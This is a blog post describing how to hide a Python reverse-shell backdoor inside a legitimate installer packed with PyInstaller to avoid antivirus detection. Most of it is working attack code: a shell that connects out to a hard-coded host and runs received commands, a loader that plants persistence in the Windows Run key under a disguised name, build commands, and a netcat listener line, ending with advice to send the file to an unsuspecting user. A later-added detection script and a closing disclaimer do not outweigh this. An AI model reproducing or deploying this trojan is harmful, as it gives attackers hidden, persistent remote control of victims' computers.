Backdoors embedded alongside installers

By Marshall Whittaker
Posted Dec 16, 2022 3 min read
backdoor shell shellcode reverse-shell installer embedded embedding binaries persistence
What is PyInstaller and why do we need it?

PyInstaller produces a single binary that bundles the Python interpreter, your Python dependencies, your Python scripts, and any other binaries (.exe or .dll) you choose to include. You may also link in an icon resource at build time. Why do I use PyInstaller? Because it is commonly enough used that the packed binary itself won’t be flagged as a virus or as malware, yet I can still pack malicious code inside it.

What malicious code

A legitimate installer or program, meaning any piece of compiled code (à la an .exe) unrelated to this project’s code, can be imported in and executed at the same time my reverse shell starts. The malicious code does its business in the background, forking off as another process and copying itself to a new location, while the user runs the installer or program as normal, with no knowledge of the backdoor that is about to pop back out through the firewall by connecting “outbound” towards a netcat listener. While this is happening, a registry key is created which enters our reverse shell into the system’s Administrator level startup chain. It’s easy to spot if you know what you are looking for, but generally this will be persistent long enough that you can allow yourself a couple of mistakes and still have access to the machine (not get locked out). If you happen to get disconnected, kill and then restart the netcat listener per: nc -l -p 7777 -v (change the port as necessary), and within a couple of seconds the reverse shell loops back around and fires off another connection request towards your listener with another Administrator shell.

The shell’s code

This isn’t particularly interesting shellcode, however it is handy. I recommend editing it to your use case in Notepad++, because things like the attacker host and port are hard coded.

import os
import socket
import subprocess
import time
import sys

host = '01.dev.oxasploits.com'
port = 7887

def shell():
    # Connect out to the hard-coded listener and announce who we are
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(str.encode("[*] Connect back from victim!\n"))
    s.send(str.encode(os.getlogin() + "\n\n"))
    while 1:
        try:
            time.sleep(3)
            # Prompt with the current directory, then wait for a command
            s.send(str.encode(os.getcwd() + "> "))
            data = s.recv(1024).decode("UTF-8")
            data = data.strip('\n')
            if data == "quit":
                break
            if data[:2] == "cd":
                os.chdir(data[3:])
            if len(data) > 0:
                # Run the command through the shell and return stdout + stderr
                proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                        stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                stdout_value = proc.stdout.read() + proc.stderr.read()
                output_str = str(stdout_value, "UTF-8")
                s.send(str.encode("\n" + output_str))
        except Exception as e:
            break
    s.close()

# Reconnect loop: if the listener goes away, wait and try again
while 1:
    try:
        shell()
        time.sleep(15)  # was a bare sleep(), which is not imported
    except Exception as f:
        continue

The packed loader

import os
import sys  # needed by resource_path (sys._MEIPASS)
import time
import winreg
import shutil
import subprocess
from pathlib import Path

host = '01.dev.oxasploits.com'

def resource_path(relative_path):
    # PyInstaller unpacks bundled files into the temp dir named by sys._MEIPASS
    base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))
    return os.path.join(base_path, relative_path)

def registry_start(app_name, key_data=None, autostart: bool = True) -> bool:
    # Add (or remove) a value under the current user's Run key
    with winreg.OpenKey(
            key=winreg.HKEY_CURRENT_USER,
            sub_key=r'Software\Microsoft\Windows\CurrentVersion\Run',
            reserved=0,
            access=winreg.KEY_ALL_ACCESS,
    ) as key:
        try:
            if autostart:
                winreg.SetValueEx(key, app_name, 0, winreg.REG_SZ, key_data)
            else:
                winreg.DeleteValue(key, app_name)
        except OSError:
            return False
    return True

# Launch the bundled reverse shell and the real installer side by side
subprocess.Popen(resource_path(r'.\shell.exe'))
subprocess.Popen(resource_path('nppi.exe'))

pwnpath = r'C:\Windows\Tasks\taskserv.exe'

# Copy the shell somewhere persistent and register it to start on logon
ppath = Path(pwnpath)
if not ppath.is_file():
    shutil.copyfile(resource_path('shell.exe'), pwnpath)
    registry_start('TaskServ', pwnpath)

Build

Then all you need to do is build the project with:

pyinstaller.exe --windowed --noconsole --onefile --uac-admin .\shell.py
copy dist\shell.exe .\
pyinstaller.exe --add-binary="shell.exe;." --add-binary="nppi.exe;." --icon=npp_103.ico --windowed --noconsole --onefile --uac-admin .\loader.py

Then run the .bat and send it on its way to be picked up by an unsuspecting computer user.
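Added example, not part of the post: a small Python triage script for the two artifacts this loader leaves behind, a Run-key value pointing into C:\Windows\Tasks and a PyInstaller-packed executable. It assumes the Run-key values have already been exported into a list (a constructed sample is embedded) and recognises packed binaries by the PyInstaller archive cookie magic; the list of odd directories is an assumption a defender would tune.

```python
from pathlib import PureWindowsPath

# PyInstaller appends its archive (interpreter, scripts, --add-binary files)
# to a stub executable; the archive trailer carries this cookie magic.
PYINSTALLER_MAGIC = b"MEI\014\013\012\013\016"

# Directories a legitimate Run-key target rarely lives in. This is an
# assumption for the example, not an exhaustive or authoritative list.
ODD_DIRS = ("c:/windows/tasks", "c:/windows/temp", "c:/users/public")


def is_pyinstaller_packed(blob: bytes) -> bool:
    """True when the tail of a PE image carries the PyInstaller cookie."""
    return PYINSTALLER_MAGIC in blob[-4096:]


def command_exe(command: str) -> str:
    """Extract the executable path from a Run-key command line."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    return command.split(" ", 1)[0]


def suspicious_run_entries(entries):
    """Return names of Run values whose target sits in an odd directory."""
    flagged = []
    for name, command in entries:
        path = PureWindowsPath(command_exe(command)).as_posix().lower()
        if any(path.startswith(d + "/") for d in ODD_DIRS):
            flagged.append(name)
    return flagged


# Constructed sample: one benign OneDrive entry plus the loader's TaskServ value.
SAMPLE_RUN_KEY = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("TaskServ", r"C:\Windows\Tasks\taskserv.exe"),
]
# Constructed byte strings standing in for a packed and an unpacked PE file.
SAMPLE_PACKED = b"MZ" + b"\x00" * 64 + PYINSTALLER_MAGIC + b"\x00" * 24
SAMPLE_PLAIN = b"MZ" + b"\x00" * 100

if __name__ == "__main__":
    print("odd Run entries:", suspicious_run_entries(SAMPLE_RUN_KEY))
    print("packed:", is_pyinstaller_packed(SAMPLE_PACKED), is_pyinstaller_packed(SAMPLE_PLAIN))
```

A PyInstaller hit on its own is only a triage signal, since plenty of legitimate tooling is packed the same way; the Run-key location is the stronger indicator here.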

The End

In the end this is pretty evil code and should never be used against a target. Seriously, under any circumstances, ever. It looks benign and totally compromises a machine while hiding its existence and persistently opens connections to pwn the machine.

Do. Not. Abuse. This. Code.

This post is licensed under CC BY 4.0 by the author.
© 2023 Marshall Whittaker. Some rights reserved.